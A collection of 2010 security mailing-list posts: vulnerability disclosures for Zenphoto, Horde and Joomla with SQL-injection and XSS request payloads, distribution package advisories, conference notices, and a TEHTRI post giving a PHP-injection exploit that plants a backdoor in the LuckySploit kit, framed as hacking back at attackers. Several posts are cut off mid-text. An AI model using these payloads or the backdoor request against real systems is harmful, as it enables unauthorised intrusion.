Security problems in Zenphoto version 1.3
We are continuing with the list of security vulnerabilities found in a number of web applications while testing our latest version of Acunetix WVS v7 . In this blog post, we will look into the details of a number of security problems discovered by Acunetix WVS in the popular web gallery application Zenphoto. Zenphoto is a standalone gallery CMS that just makes sense and doesn’t try to do everything and your dishes. We hope you agree with our philosophy: simpler is better. Don’t get us wrong though – Zenphoto really does have everything you need for web media gallery management. The following web vulnerabilities were found in Zenphoto Version 1.3; 1. SQL injection in “/zenphoto_1_3/zp-core/full-image.php”, parameter “a”. 2. Cross-site Scripting vulnerability in “/zenphoto_1_3/zp-core/admin.php”, parameter “from”. 3.Cross-site Scripting vulnerability in “/zenphoto_1_3/zp-core/admin.php”, parameter “user”. Technical details about each web vulnerability are below; 1. SQL injection in “/zenphoto_1_3/zp-core/full-image.php”, parameter “a”. Source file: /var/www/zenphoto_1_3/zp-core/functions-db.php line: 65 Additional details: SQL Query: SELECT `id`, `album_theme` FROM `zp_albums` WHERE `folder` LIKE "1ACUSTART'"*" OR `folder` LIKE "1ACUSTART'"*/ ACUEND" Stack trace: 1. query([string] "SELECT `id`, `album_theme` FROM `zp_albums` WHERE `folder` LIKE "1ACUSTART'"*" OR `folder` LIKE "1ACUSTART'"*/\n ACUEND"", [boolean] false) 2. query_full_array([string] "SELECT `id`, `album_theme` FROM `zp_albums` WHERE `folder` LIKE "1ACUSTART'"*" OR `folder` LIKE "1ACUSTART'"*/\nACUEND"") 3. getAlbumInherited([string] "1ACUSTART'"*/\nACUEND", [string] "album_theme", [NULL] ) 4. themeSetup([string] "1ACUSTART'"*/\n ACUEND") As you can see in the SQL query (or the stack trace), in order to alter the SQL statement sent to the database you need to use a double qoute (not a single one, as in most SQL injections). Sample HTTP request: GET /zenphoto_1_3/zp-core/full-image.php?a=%24%7binjecthere%7d&i=system-bug.jpg&q=75 HTTP/1.1 Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c Acunetix-Aspect: enabled Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479 Host: webapps7:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) 2. Cross-site Scripting vulnerability in “/zenphoto_1_3/zp-core/admin.php”, parameter “from”. Attack details URL encoded GET input from was set to ” onmouseover=prompt(934419) bad=”. The input is reflected inside a tag element between double quotes. Sample HTTP request: GET /zenphoto_1_3/zp-core/admin.php?from=%22%20onmouseover%3dprompt%28934419%29%20bad%3d%22 HTTP/1.1 Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479 Host: webapps7:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) 3. Cross-site Scripting vulnerability in “/zenphoto_1_3/zp-core/admin.php”, parameter “user”. Attack details URL encoded POST input user was set to ” onmouseover=prompt(932890) bad=”. The input is reflected inside a tag element between double quotes. Sample HTTP Request: POST /zenphoto_1_3/zp-core/admin.php HTTP/1.1 Content-Length: 149 Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479 Host: webapps7:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) code_h=1644ca84b35bf7663c5e828744339de8&login=1&pass=acUn3t1x&redirect=%2fzp-core%2fadmin.php&user=%22%20onmouseover%3dprompt%28932890%29%20bad%3d%22 These vulnerabilities were reported to the Zenphoto team on 22/7/2010 via the trac system on their website and they were fixed in latest version of Zenphoto. If you are using Zenphoto, download the latest version from their website. - Bogdan Calin - bogdan [at] acunetix.com CTO Acunetix Ltd. - http://www.acunetix.com Acunetix Web Security Blog - http://www.acunetix.com/blog Follow us on Twitter - http://www.twitter.com/acunetix
[ MDVSA-2010:171 ] lvm2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:171 http://www.mandriva.com/security/ ___ Package : lvm2 Date: September 6, 2010 Affected: 2009.1, 2010.0, 2010.1 ___ Problem Description: A vulnerability has been found and corrected in lvm2: The cluster logical volume manager daemon (clvmd) in lvm2-cluster in LVM2 before 2.02.72, as used in Red Hat Global File System (GFS) and other products, does not verify client credentials upon a socket connection, which allows local users to cause a denial of service (daemon exit or logical-volume change) or possibly have unspecified other impact via crafted control commands (CVE-2010-2526). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2526 ___ Updated Packages: Mandriva Linux 2009.1: 11ac47baa0dffc858deae4847afc95bc 2009.1/i586/clvmd-2.02.33-8.1mnb2.i586.rpm 3e28f4c39a97f96dff14ea07e63c0375 2009.1/i586/lvm2-2.02.33-8.1mnb2.i586.rpm 1473d81d8d69eecfffeba569d6a524ab 2009.1/SRPMS/lvm2-2.02.33-8.1mnb2.src.rpm Mandriva Linux 2009.1/X86_64: f3c07dc0fa38749ea2be8b8a334e08c7 2009.1/x86_64/clvmd-2.02.33-8.1mnb2.x86_64.rpm 18f0a933f3236c38a7b2f0c8fdfb0516 2009.1/x86_64/lvm2-2.02.33-8.1mnb2.x86_64.rpm 1473d81d8d69eecfffeba569d6a524ab 2009.1/SRPMS/lvm2-2.02.33-8.1mnb2.src.rpm Mandriva Linux 2010.0: 28d2ca049d8736523166f7c99730550d 2010.0/i586/clvmd-2.02.53-9.2mnb2.i586.rpm e6456c6b7f8b64bb9579cd485fd1883c 2010.0/i586/dmsetup-1.02.38-9.2mnb2.i586.rpm f44de286bd97799df0633639605f9a7b 2010.0/i586/libdevmapper1.02-1.02.38-9.2mnb2.i586.rpm 9b497f111670636f1dfc9fd3d0635b63 2010.0/i586/libdevmapper-devel-1.02.38-9.2mnb2.i586.rpm dc1d8288bc99b1a1e18508d6a0edb595 2010.0/i586/libdevmapper-event1.02-1.02.38-9.2mnb2.i586.rpm 9b01ee505c3a4949fa0f161c03280b83 2010.0/i586/libdevmapper-event-devel-1.02.38-9.2mnb2.i586.rpm 61cfd88b9c6789d37fdaf4f6254116ff 2010.0/i586/liblvm2cmd2.02-2.02.53-9.2mnb2.i586.rpm 929d5d33f66502a078cd8212e1b537b1 2010.0/i586/liblvm2cmd-devel-2.02.53-9.2mnb2.i586.rpm b17cbac08c61dce99597e6dbb6702045 2010.0/i586/lvm2-2.02.53-9.2mnb2.i586.rpm 27e1f390f03910f521d6c9248fd28cfb 2010.0/SRPMS/lvm2-2.02.53-9.2mnb2.src.rpm Mandriva Linux 2010.0/X86_64: 3bf5a13a5e066af39062bdaa7a4e6d87 2010.0/x86_64/clvmd-2.02.53-9.2mnb2.x86_64.rpm aa1f570c9a929aee83dd9547ae905468 2010.0/x86_64/dmsetup-1.02.38-9.2mnb2.x86_64.rpm 81f077f42936ec8be557105a220a149b 2010.0/x86_64/lib64devmapper1.02-1.02.38-9.2mnb2.x86_64.rpm e90c54801d5d3e201d68731e2cbc4dc5 2010.0/x86_64/lib64devmapper-devel-1.02.38-9.2mnb2.x86_64.rpm 56d2c5cd25dfef94a15568c420743fea 2010.0/x86_64/lib64devmapper-event1.02-1.02.38-9.2mnb2.x86_64.rpm 4cff5d26f20d11a57a7dffe7fb3421a8 2010.0/x86_64/lib64devmapper-event-devel-1.02.38-9.2mnb2.x86_64.rpm 40f4f8aa95abd23c8640e5cf22031b02 2010.0/x86_64/lib64lvm2cmd2.02-2.02.53-9.2mnb2.x86_64.rpm a87f6ecae4c05b5ced933cb3468ed499 2010.0/x86_64/lib64lvm2cmd-devel-2.02.53-9.2mnb2.x86_64.rpm 96c9b9781d1168c90a557cc583930a7e 2010.0/x86_64/lvm2-2.02.53-9.2mnb2.x86_64.rpm 27e1f390f03910f521d6c9248fd28cfb 2010.0/SRPMS/lvm2-2.02.53-9.2mnb2.src.rpm Mandriva Linux 2010.1: 48f74df7e0156e45f230429aa41cea7a 2010.1/i586/clvmd-2.02.61-5.1mnb2.i586.rpm a5fa92bb7251a9f9b9a651a9d681c470 2010.1/i586/cmirror-2.02.61-5.1mnb2.i586.rpm c7281a45862b7460be4b9623165cc591 2010.1/i586/dmsetup-1.02.44-5.1mnb2.i586.rpm 98c4f715edc57a2a81631cb2ab9a824b 2010.1/i586/libdevmapper1.02-1.02.44-5.1mnb2.i586.rpm e5b0271e14e85ad94cb3e746960993b1 2010.1/i586/libdevmapper-devel-1.02.44-5.1mnb2.i586.rpm 2b83f2c3a303604e42868b074364b017 2010.1/i586/libdevmapper-event1.02-1.02.44-5.1mnb2.i586.rpm aef97aaed0fd616df5a046d9b05f55e2 2010.1/i586/libdevmapper-event-devel-1.02.44-5.1mnb2.i586.rpm 1ed885e2a23ca5f9bdaa5796615feeea 2010.1/i586/liblvm2app2.1-2.02.61-5.1mnb2.i586.rpm 9a62cea841692f4a744019664cb6b959 2010.1/i586/liblvm2cmd2.02-2.02.61-5.1mnb2.i586.rpm a1bc253b7a92b6c7b1ac96e7e2521ee3 2010.1/i586/liblvm2cmd-devel-2.02.61-5.1mnb2.i586.rpm 972c3885883f95b793e4dfaa46121685 2010.1/i586/liblvm2-devel-2.02.61-5.1mnb2.i586.rpm 08190534acaa182f48f8c2aca8b3ad31 2010.1/i586/lvm2-2.02.61-5.1mnb2.i586.rpm 3de3e283a5907efe36b7f5b9038c32a2 2010.1/SRPMS/lvm2-2.02.61-5.1mnb2.src.rpm Mandriva Linux 2010.1/X86_64: 3c33074b320e7b7651b9872674bce70b 2010.1/x86_64/clvmd-2.02.61-5.1mnb2.x86_64.rpm e0bcdee0b2f4e725bfd17b35a9959aa0 2010.1/x86_64/cmirror-2.02.61-5.1mnb2.x86_64.rpm 47c54c45f3f00ae9fe0f9176623739ac
The Zed Attack Proxy (ZAP) version 1.0.0
Hello, I'd like to announce the first release of the Zed Attack Proxy (ZAP) - https://code.google.com/p/zaproxy/ - a penetration test tool designed to be used to make web applications more secure. Why has it been released? There are many excellent pen test tools, but few of them are really suitable for people with little pen test experience. ZAP is really intended for developers and functional testers who are new to pen testing. However experienced pen testers may find it useful as well. While ZAP can detect some security issues automatically, it is primarily designed to help you find security vulnerabilities manually. In order to make ZAP as easy to use as possible a user guide is available both as context sensitive help within ZAP and online. ZAP is a fork of the well regarded Paros Proxy and is open source and cross platform. Note that there will NOT be a 'Pro' version of ZAP, so there will be no incentive to restrict the features available in the 'free' version :) Involvement in the development of ZAP is actively encouraged. Regards, Psiinon
[SECURITY] [DSA-2103-1] New smbind packages fix sql injection
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-2103-1 secur...@debian.org http://www.debian.org/security/Giuseppe Iuculano September 05, 2010http://www.debian.org/security/faq - Package: smbind Vulnerability : sql injection Problem type : remote Debian-specific: no CVE ID : none assigned yet It was discovered that smbind, a PHP-based tool for managing DNS zones for BIND, does not properly validating input. An unauthenticated remote attacker could execute arbitrary SQL commands or gain access to the admin account. For the stable distribution (lenny), this problem has been fixed in version 0.4.7-3+lenny1. For the unstable distribution (sid), this problem has been fixed in version 0.4.7-5, and will migrate to the testing distribution (squeeze) shortly. We recommend that you upgrade your smbind (0.4.7-3+lenny1) package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - Debian (stable) - --- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/s/smbind/smbind_0.4.7.orig.tar.gz Size/MD5 checksum:90623 8474d376798773e3fac85564cf6b57cb http://security.debian.org/pool/updates/main/s/smbind/smbind_0.4.7-3+lenny1.diff.gz Size/MD5 checksum:12752 d19eaec93f7aec12b7a776d5056ad650 http://security.debian.org/pool/updates/main/s/smbind/smbind_0.4.7-3+lenny1.dsc Size/MD5 checksum: 1038 49648258f7ca6f057e8f4ae156f250fb Architecture independent packages: http://security.debian.org/pool/updates/main/s/smbind/smbind_0.4.7-3+lenny1_all.deb Size/MD5 checksum:94656 25b628ff527d505824d139d5e8d10259 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-annou...@lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAkyEC+QACgkQNxpp46476arnSgCfcyXa3LsnWqpi/vzbmiaPl5PH PBMAn0SWLgjHwK7VQveyIMzq4HjnX0Ib =8m8H -END PGP SIGNATURE-
H2HC São Paulo - Capture the Captcha
We would like to thank to our sponsors for making this game possible: Bonsai for hosting the game and Tenable for providing the prize! A Captcha is a type of challenge-response test used in computing to ensure that the response is not generated by a computer. It is a contrived acronym for "Completely Automated Public Turing test to tell Computers and Humans Apart." The process usually involves one computer asking a user to complete a simple test (Captcha) which the computer is able to generate and grade. Because other computers are unable to solve the Captcha, any user entering a correct solution is presumed to be Human. There are a lot of Captcha implementations out there, written in JSP, PHP, ASP, .NET which are very poorly implemented and introduce serious bugs in Web applications they are supposed to protect. We developed 10 different Captcha implementations, each with its own weakness, for participants to break using automation and hacking techniques with the objective of bypassing the human verification process. Teams (or a single participant) are scored on their success in breaking the security behind every presented Captcha on the game. This CTC contest is designed to serve as an educational exercise to give participants experience in securing Web Applications from automated attacks, as well as conducting and reacting to the sort of Captchas found in the wild. The participantes will need to register during the conference and the winners will need to provide full information in order to receive the major prize: The Nessus Professional Edition from Tenable!
XSS in Horde Application Framework <=3.3.8, icon_browser.php
Hi,
Horde Application Framework v3.3.8 and lower are subject to a cross site
scripting (XSS) vulnerability.
The icon_browser.php script fails to properly sanitize user supplied
input to the 'subdir' URL parameter before printing it out as part of a
HTML formatted error message.
The following URL can be used as a proof of concept:
> [path_to_horde]/util/icon_browser.php?subdir= onload="alert('XSS')">&app=horde
Prior authentication is not required for exploitation.
This vulnerability was reported to the Horde Project on 19.05.2010 and
fixed by Michael M. Slusarz in the frameworks' GIT repository within a week:
> http://git.horde.org/diff.php/horde/util/icon_browser.php?rt=horde-git&r1=a978a35c3e95e784253508fd4333d2fbb64830b6&r2=9342addbd2b95f184f230773daa4faf5ef6d65e9
Hoping to see an upcoming fixed release (which did not take place)
I have delayed publication - admittedly too much.
Credits for this discovery:
Moritz Naumann
Naumann IT Security Consulting, Berlin, Germany
http://moritz-naumann.com
Moritz
[USN-983-1] Sudo vulnerability
=== Ubuntu Security Notice USN-983-1 September 07, 2010 sudo vulnerability CVE-2010-2956 === A security issue affects the following Ubuntu releases: Ubuntu 9.10 Ubuntu 10.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 9.10: sudo1.7.0-1ubuntu2.5 sudo-ldap 1.7.0-1ubuntu2.5 Ubuntu 10.04 LTS: sudo1.7.2p1-1ubuntu5.2 sudo-ldap 1.7.2p1-1ubuntu5.2 In general, a standard system update will make all the necessary changes. Details follow: Markus Wuethrich discovered that sudo did not always verify the user when a group was specified in the Runas_Spec. A local attacker could exploit this to execute arbitrary code as root if sudo was configured to allow the attacker to use a program as a group when the attacker was not a part of that group. Updated packages for Ubuntu 9.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.7.0-1ubuntu2.5.diff.gz Size/MD5:25514 9bfdb8f41c6a5dd5544e6d6b8ab4ac5c http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.7.0-1ubuntu2.5.dsc Size/MD5: 1117 431ea989e3fa57b00f8fb13f3e54a025 http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.7.0.orig.tar.gz Size/MD5: 744311 5fd96bba35fe29b464f7aa6ad255f0a6 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.7.0-1ubuntu2.5_amd64.deb Size/MD5: 310700 e0e0a0dc1fb83f31f996679b9b13b01f http://security.ubuntu.com/ubuntu/pool/universe/s/sudo/sudo-ldap_1.7.0-1ubuntu2.5_amd64.deb Size/MD5: 334376 9492e829a5b04057a804697e644b9644 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.7.0-1ubuntu2.5_i386.deb Size/MD5: 298210 70b9f891286606ce2a4b1db2f3676bd4 http://security.ubuntu.com/ubuntu/pool/universe/s/sudo/sudo-ldap_1.7.0-1ubuntu2.5_i386.deb Size/MD5: 319766 c0df54d97c686bccea3a2b986833d44e lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/s/sudo/sudo_1.7.0-1ubuntu2.5_lpia.deb Size/MD5: 298316 609d145034a593e5b637c0c5b9e176b8 http://ports.ubuntu.com/pool/universe/s/sudo/sudo-ldap_1.7.0-1ubuntu2.5_lpia.deb Size/MD5: 320176 426ef7871e3c372491fbbd8790350857 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/s/sudo/sudo_1.7.0-1ubuntu2.5_powerpc.deb Size/MD5: 306220 7b0b1b6e6ee37e4b33a638e7f2ac292e http://ports.ubuntu.com/pool/universe/s/sudo/sudo-ldap_1.7.0-1ubuntu2.5_powerpc.deb Size/MD5: 329152 1b0cb4498c03cc2883c00837bff8bb83 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/s/sudo/sudo_1.7.0-1ubuntu2.5_sparc.deb Size/MD5: 301892 f46d44e1a8c46a575c5c4f0700910462 http://ports.ubuntu.com/pool/universe/s/sudo/sudo-ldap_1.7.0-1ubuntu2.5_sparc.deb Size/MD5: 323970 7a10f46aa2c9388aa74a342d44c41ac4 Updated packages for Ubuntu 10.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.7.2p1-1ubuntu5.2.diff.gz Size/MD5:26583 f3077ddbefcc852cb66d71ec63e0013c http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.7.2p1-1ubuntu5.2.dsc Size/MD5: 1131 456ecc22f3b88cb3e60dbfac679b110a http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.7.2p1.orig.tar.gz Size/MD5: 771059 4449d466a774f5ce401c9c0e3866c026 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.7.2p1-1ubuntu5.2_amd64.deb Size/MD5: 326768 29f77801c5304c74366abaecd451080b http://security.ubuntu.com/ubuntu/pool/universe/s/sudo/sudo-ldap_1.7.2p1-1ubuntu5.2_amd64.deb Size/MD5: 350566 08c716ab408e519bb090e2a46715696c i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.7.2p1-1ubuntu5.2_i386.deb Size/MD5: 312528 8bdaeb041859991919aade6a85c70cd1 http://security.ubuntu.com/ubuntu/pool/universe/s/sudo/sudo-ldap_1.7.2p1-1ubuntu5.2_i386.deb Size/MD5: 334432 bf7f83603498e26e4f7618eea82cb836 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/s/sudo/sudo_1.7.2p1-1ubuntu5.2_powerpc.deb Size/MD5: 321234 498592d623ad408c02dc9dc3794674ae http://ports.ubuntu.com/pool/universe/s/sudo/sudo-ldap_1.7.2p1-1ubuntu5.2_powerpc.deb Size/MD5: 345118 09a20cd3444df0ac4ac34b0829332fac sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/s/sudo/sudo_1.7.2p1-1ubuntu5.2_sparc.deb Size/MD5: 318604 71c8f38d4
Call for Papers H2HC Cancun/Mexico and H2HC Sao Paulo/Brazil
CALL FOR PAPERS - Hackers 2 Hackers Conference 7th edition The call for papers for H2HC 7th edition is now open. H2HC is a hacker conference taking place in Sao Paulo, Brazil, from 27 to 28 November 2010 and this year for the first time also in Cancun, on 3 of December 2010. [ - Introduction - ] For the seventh consecutive year and past success we have been having, the annual Hackers 2 Hackers Conference will be held again in Sao Paulo, from 27 to 28 November 2010, and for the first time also in Cancun, on 3rd of December 2010 and aims to get together industry, government, academia and underground hackers to share knowledge and leading-edge ideas about information security and everything related to it. H2HC will feature national and international speakers and attendees with a wide range of skills. The atmosphere is favorable to present all facets of computer security subject and will be a great opportunity to network with like-minded people and enthusiasts. The conference language is either Portuguese or English for the São Paulo Edition and Spanish and English for the Cancun edition. [ - The venue - ] H2HC 7th edition will take place at Novotel Morumbi \ (http://www.accorhotels.com.br/guiahoteis/novotel/hotel_convencao.asp?cd_hotel=20) in an auditorium with capacity for up to 400 people. The first edition of H2HC in Cancun will take place at Melia ME Cancun (http://www.me-cancun.com/) in an auditorium with capacity for up to 150 people. [*] About Sao Paulo (taken from fiquemaisumdia.com.br) The city is the largest in Brazil and first in South America by population. Quite often Sao Paulo intimidates people because of its size, its constant pedestrian and vehicle traffic, ethnic and cultural multiplicity. Sao Paulo will surprise you wheter you come here on business or for an expo, a congress or a convenion, stay for at least one more day. Let yourself be seduced by the cultural diversity of this many-faceted city which vibrates, dictates fashion, is always anticipating trends, and welcomes Brazilians and foreigners from all over. And oh, do not forget to have fun in South America's wildest night life. [*] About Cancun (wikipedia.com) Cancún (Spanish pronunciation: [ka?'kun]) is a coastal city in Mexico's easternmost state, Quintana Roo, on the Yucatán Peninsula. Cancún is located on the Yucatan Channel that separates Mexico from the island of Cuba in the Greater Antilles. The Cancún region is sometimes known as the Mexican Caribbean. [ - Topics - ] H2HC committee gives preference to lectures with practical demonstration. The conference staff will try to provide every equipment needed for the presentation in the case the author cannot provide them. The following topics include, but are not limited to: * Penetration testing * Web application security * Exploit development techniques * Telecom security and phone phreaking * Fuzzing and application security test * Techniques for development of secure software and systems * Hardware hacking, embedded systems and other electronic devices * Mobile devices exploitation, Symbian, P2K and bluetooth technologies * Analysis of virus, worms and all sorts of malwares * Reverse engineering * Rootkits * Security in Wi-Fi and VoIP environments * Information about smartcard and RFID security and similars * Technical approach to alternative operating systems * Denial of service attacks and/or countermeasures * Security aspects in SCADA and industrial environments and "obscure" networks * Cryptography * Lockpicking, trashing, physical security and urban exploration * Internet, privacy and Big Brother * Information warfare and industrial espionage [ - Important dates - ] Conference and trainings - H2HC São Paulo/Brazil November 25th and 26th: H2HC trainings 1 November 27th and 28th: H2HC 7th edition November 29th and 30th: H2HC trainings 2 Conference - H2HC Cancun/Mexico December 3rd Deadline and submissions Deadline for proposal submissions: September 25 2010 Deadline for slides submissions: October 05 2010 Notification of acceptance or rejection: no later than October 10 2010 * E-mail for proposal submissions: rodrigo *noSPAM* kernelhacking *dot* com * Make sure to provide along with your submission the following details: * Speaker name or handle, address, e-mail, phone number and general contact information * A brief but informative description about your talk * Short biography of the presenter, including organization, company and affiliations * Estimated time-length of presentation * General topic of the speech (eg.: network security, secure programming, computer forensics, etc.) * Any other technical requirements for your lecture * Whether you need visa to enter Brazil or not Speakers will be allocated 50 minutes of presentation time, although, if needed, we can extend the presentation length if requested in a
[ GLSA 201009-03 ] sudo: Privilege Escalation
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201009-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: sudo: Privilege Escalation Date: September 07, 2010 Bugs: #322517, #335381 ID: 201009-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis The secure path feature and group handling in sudo allow local attackers to escalate privileges. Background == sudo allows a system administrator to give users the ability to run commands as other users. Affected packages = --- Package /Vulnerable/ Unaffected --- 1 app-admin/sudo < 1.7.4_p3-r1 >= 1.7.4_p3-r1 Description === Multiple vulnerabilities have been reported in sudo: * Evan Broder and Anders Kaseorg of Ksplice, Inc. reported that the sudo 'secure path' feature does not properly handle multiple PATH variables (CVE-2010-1646). * Markus Wuethrich of Swiss Post reported that sudo fails to restrict access when using Runas groups and the group (-g) command line option (CVE-2010-2956). Impact == A local attacker could exploit these vulnerabilities to gain the ability to run certain commands with the privileges of other users, including root, depending on the configuration. Workaround == There is no known workaround at this time. Resolution == All sudo users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-admin/sudo-1.7.4_p3-r1" References == [ 1 ] CVE-2010-1646 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1646 [ 2 ] CVE-2010-2956 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2956 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201009-03.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2010 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature
nmap <= 5.21 is vulnerable to Windows DLL Hijacking Vulnerability.
1. Overview nmap <= 5.21 is vulnerable to Windows DLL Hijacking Vulnerability. 2. Vulnerability Description nmap passes insufficiently qualified path for the dll "airpcap.dll" while opening a file using nmap Timeline 27-08-2010 - Discovered Vulnerability 31-08-2010 - Disclosed at nmap-dev mailing list 04-09-2010 - Response and fix from developers 05-09-2010 - Disclosure 3. Exploitability A file extension needs to be registered with nmap to exploit the vulnerability and a crafted file needs to be opened from a network share. Currently nmap is not registered with any filename so users are not at risk by default. 4. Versions Affected nmap 5.21 and lower. 5. POC/Exploit Done with Webdav hijack module of Metasploit. 6. Impact Remote Code Execution in context of nmap process. 7. References http://seclists.org/nmap-dev/2010/q3/632 8. Solution Fixed in latest development release.
[TEHTRI-Security Training + 0days] "Hunting Web Attackers" at HITBSecConf
Gents, We wanted to let you know that TEHTRI-Security will release many 0days and offensive technologies during a new training called : - "Hunting Web Attackers" It will be proposed during HackInTheBox SecConf Malaysia 2010 in October, in Kuala Lumpur. The 0days will be disclosed under a NDA (for students only) and will help at fighting back web attackers, as we already explained in the past in China and in Singapore (SyScan). As a teaser, this email contains one of our remote 0day exploits. We also found 0days against Zeus, Eleonore, CrimePack, etc. Our self-defense cyber-weapons will be disclosed during this training. -- BEGIN Security Advisory -- Vuln : TEHTRI-SA-2010-018 Tool : LuckySploit Exploit Pack Title: Remote execution in LuckySploit LuckySploit is a tool used by attackers to penetrate companies or personal computers by abusing client-side vulnerabilities. This malware exploitation kit is full of anti Microsoft technologies. By auditing this Malware, TEHTRI-Security has found a pre-auth remote exploit in the file /mod/to.php By sending a specially crafted HTTP packet with a POST argument, it's possible to simulate a configuration modification, and to inject PHP code that will be able to be executed after. Here is an example, where we modify the remote file "7.php" by adding our own PHP code inside it (PoC anti kiddies: phpinfo() added). POST sent to http://target/luckysploit/mod/to.php?mod=thread_optn&id=../../tconf/7 With arguments : z=1&exp_pre_config=2&advanced_unik=0&referer_not_empty=0&JS_MODE=0&unquie_type=0&unquie_time=1000%3Bphpinfo%28%29%3Bexit%28%29%3B%3F%3Eaa&stat_packtime=10&country_allow_list=&referer_only=&traff_back_url=&gzip_status=1&gzip_status2=1&ip2cos=1&system_status=1&referer_status=1&puniqstatus=1&puniqblock=0 Then you can access your new remote backdoor here : http://target/luckysploit/tconf/7.php This exploit is provided by TEHTRI-Security as a technical proof to show that defenders who are under attack, might be able to strike back against a group of evil intruders trying to commit cyber crimes against them. But this should not be used out of legal field. This might help at getting the identities of attackers, or at hacking their workstations, or at destroying their tools and infrastructures (anti-cyber-war & anti-cyber-spy technologies). -- END Security Advisory -- If you want to be sure to have your seat for this outstanding offensive training, please do register as soon as possible (Technical Training Track3 / TT3 - Hunting Web Attackers, 11-12 October ) : http://conference.hackinthebox.org/hitbsecconf2010kul/?page_id=274 See you soon at the awesome international conference HITBSecConf Malaysia 2010, Laurent OUDOT, CEO & Founder TEHTRI-Security http://www.tehtri-security.com/ * References: - BBC => http://www.bbc.co.uk/news/10349001 - Zdnet => http://www.zdnet.com/blog/security/researchers-find-12-zero-day-flaws-targeting-5-web-malware-exploitation-kits/6752 - Btraq => http://seclists.org/bugtraq/2010/Jun/178 - HITB => http://conference.hackinthebox.org/hitbsecconf2010kul/
Re: KeePass version 2.12 <= Insecure DLL Hijacking Vulnerability (dwmapi.dll)
The fixed version KeePass 2.13 has been released. http://keepass.info/news/n100906_2.13.html But failure to describe "DLL Hijacking was fixed".
Joomla Component Clantools version 1.5 Blind SQL Injection Vulnerability
# Exploit Title: Joomla Component Clantools version 1.5 Blind SQL Injection Vulnerability # Date: 05.09.2010 # Author: Stephan Sattler // Solidmedia # Software Link: http://joomla-clantools.de/downloads/doc_download/26-clantools-v15-fuer-joomla-15x.html # Version: 1.5 [ Vulnerability 1 ] http://www.site.com/joomlapath/index.php?option=com_clantools&squad=1+[Blind SQL] #Vulnerability was already reported, have a look at http://www.joomla-clantools.de to get a patch
[SECURITY] [DSA-2104-1] New quagga packages fix denial of service
